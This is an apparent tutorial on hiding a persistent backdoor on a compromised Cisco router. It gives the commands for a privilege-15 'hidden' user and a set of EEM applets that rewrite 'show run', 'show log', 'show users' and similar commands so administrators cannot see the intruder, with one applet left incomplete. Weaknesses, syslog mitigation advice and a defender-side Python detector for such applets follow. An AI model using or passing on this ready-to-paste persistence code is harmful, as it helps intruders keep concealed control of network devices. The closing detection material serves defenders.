Beginning Reminder: This article is written for research and experimentation purposes only. Only ever access devices you have written, legal authorization to access.

Okay, so here's the scenario. You found your way into an elevated command prompt on a Cisco router, and you want to establish a persistent foothold on the device while leaving as few markers as possible. You need to do this with existing code, and you'd like to alter as little as possible. Cisco's EEM is the answer.

Cisco EEM (Embedded Event Manager) is a scripting facility built into any modern Cisco IOS switch or router. It allows all sorts of automatic actions to take place, and it also offers the key feature we'll exploit here: it can 'catch' a string a user enters and transparently replace it with another string, one which we'll instruct to exclude our 'malicious' pivot code.

Okay, so you're on an exec command line, what's next?

1. Create a user all your own with exec (priv 15) permissions:

config t
username hidden_YourUser priv 15 sec yourPassword1234

Note: make sure the username contains the string "hidden", because those are the lines we are hiding from the configuration below.

2. Install a few EEM applets that hide our user and history from any valid admins by proxying valid commands with commands filtered to hide our information. Each applet catches one command, re-runs it with an output filter, and prints the filtered result back to the user.

EEM Code:

! Hides the EEM code from the running config
event manager applet hidden_eemRunningConfig
 event cli pattern "show run" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show run | ex hidden|event|action"
 action 2.0 puts "$_cli_result"
!
! Hides the EEM code from the startup config
event manager applet hidden_eemStartupConfig
 event cli pattern "show start" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show start | ex hidden|event|action"
 action 2.0 puts "$_cli_result"
!
! Hides the bad actor's active SSH session
event manager applet hidden_sshSession
 event cli pattern "show ssh" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show ssh | ex hidden"
 action 2.0 puts "$_cli_result"
!
! Hides the bad actor's active VTY (telnet/ssh) session
event manager applet hidden_VTY
 event cli pattern "show users" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show users | ex hidden"
 action 2.0 puts "$_cli_result"
!
! Hides the EEM actions from showing up in local logging
event manager applet hidden_eemLogging
 event cli pattern "show log" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show log | ex HA_EM|hidden"
 action 2.0 puts "$_cli_result"
!
! Hides the EEM and new user from showing up in more system:running-config
event manager applet hidden_moreRunning
 event cli pattern "more system:running-config" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "more system:running-config | ex hidden|event|action"
 action 2.0 puts "$_cli_result"
!
! Hides the EEM and new user from showing up in more system:start
event manager applet hidden_moreStart
 event cli pattern "more system:start" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "more system:start | ex hidden|event|action"
 action 2.0 puts "$_cli_result"
!
! Prevents EEM being debugged, which could catch our malicious EEMs
event manager applet hidden_EEMdebug
 event cli pattern "debug event manager" sync yes
 action 0.0 cli command "enable"

Weaknesses of This Method

1. Syslog/external logging. There is no way to hide the execution of commands in real time, so they will be logged to an external server if the device is set up to do so.
2. All EEM scripts are hidden using this method. If administrators use EEM for their admin duties, they may become suspicious when their EEM scripts disappear.
3. Config backup. If the backup tool uses SNMP to pull a full config, your new config and user are visible. If the tool, like most tools, simply uses a service account to programmatically run "show run", your config will stay hidden.
4. The local log of the device will have many hidden lines in its buffer, so it will look short to someone looking closely.
5. If the local log uses line numbers, as recommended by Cisco security best practice (but which is not the default config!), it will be evident to someone looking closely that lines are missing.

Mitigation for Administrators

1. Syslog, syslog, syslog. First, to catch the initial changes, by frequent synchronization. Second, to catch the EEM in action, as it catches the legitimate user's commands and hides itself. Third, to catch any further activity by the bad actor as they perform future activities on the system.

Recommendations for Cisco to Fix This Issue

1. Don't allow aliasing of existing commands. This is messy programming, and allows many opportunities to cripple a router and confuse admins.
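As an added defender-side example (not from the original article), the following Python scans an out-of-band copy of the running config for applets with the catch-and-replace shape used above, and checks an exported syslog feed for the HA_EM entries that the show log hook strips from the local buffer. The config text and log lines are constructed for the demo.

```python
import re

# Constructed sample config. Pull it out-of-band (SNMP or a TFTP copy) rather
# than through an interactive "show run", which a hooking applet can filter.
SAMPLE_CONFIG = """\
hostname edge-rtr1
username admin privilege 15 secret 5 $1$PLACEHOLDER
username hidden_ops privilege 15 secret 5 $1$PLACEHOLDER
event manager applet backup-nightly
 event timer cron cron-entry "0 2 * * *"
 action 1.0 cli command "enable"
 action 2.0 cli command "copy run tftp://192.0.2.5/edge.cfg"
event manager applet hidden_eemRunningConfig
 event cli pattern "show run" sync yes
 action 0.0 cli command "enable"
 action 1.0 cli command "show run | ex hidden|event|action"
 action 2.0 puts "$_cli_result"
"""

# Constructed syslog lines as an external collector would receive them.
SAMPLE_SYSLOG = [
    "%SYS-5-CONFIG_I: Configured from console by admin on vty0 (192.0.2.9)",
    "%HA_EM-6-LOG: hidden_eemRunningConfig: rewrote show run output",
]

APPLET_RE = re.compile(r"^event manager applet (\S+)\n((?: .*\n)*)", re.M)
HOOK_RE = re.compile(r'^ event cli pattern "([^"]+)" sync yes', re.M)
FILTER_RE = re.compile(r'cli command "[^"]*\|\s*(?:ex|exclude|inc|include)\b')
ECHO_RE = re.compile(r'puts "\$_cli_result"')

def find_cli_hooks(config_text):
    """Applets that fire synchronously on an operator command, re-run it
    through an output filter and echo the result back: the shape every
    applet in the write-up shares. Returns [(applet_name, hooked_pattern)]."""
    hits = []
    for name, body in APPLET_RE.findall(config_text):
        hook = HOOK_RE.search(body)
        if hook and FILTER_RE.search(body) and ECHO_RE.search(body):
            hits.append((name, hook.group(1)))
    return hits

def eem_log_lines(syslog_lines):
    """HA_EM entries survive only off-box once "show log" is hooked,
    so inspect the collector's copy, not the device buffer."""
    return [ln for ln in syslog_lines if "%HA_EM-" in ln]

if __name__ == "__main__":
    for name, pattern in find_cli_hooks(SAMPLE_CONFIG):
        print(f"applet {name} rewrites output of '{pattern}'")
    for ln in eem_log_lines(SAMPLE_SYSLOG):
        print("EEM activity:", ln)
```

The timer-driven backup applet is deliberately left unflagged: only applets hooking an operator's CLI command and filtering its output match.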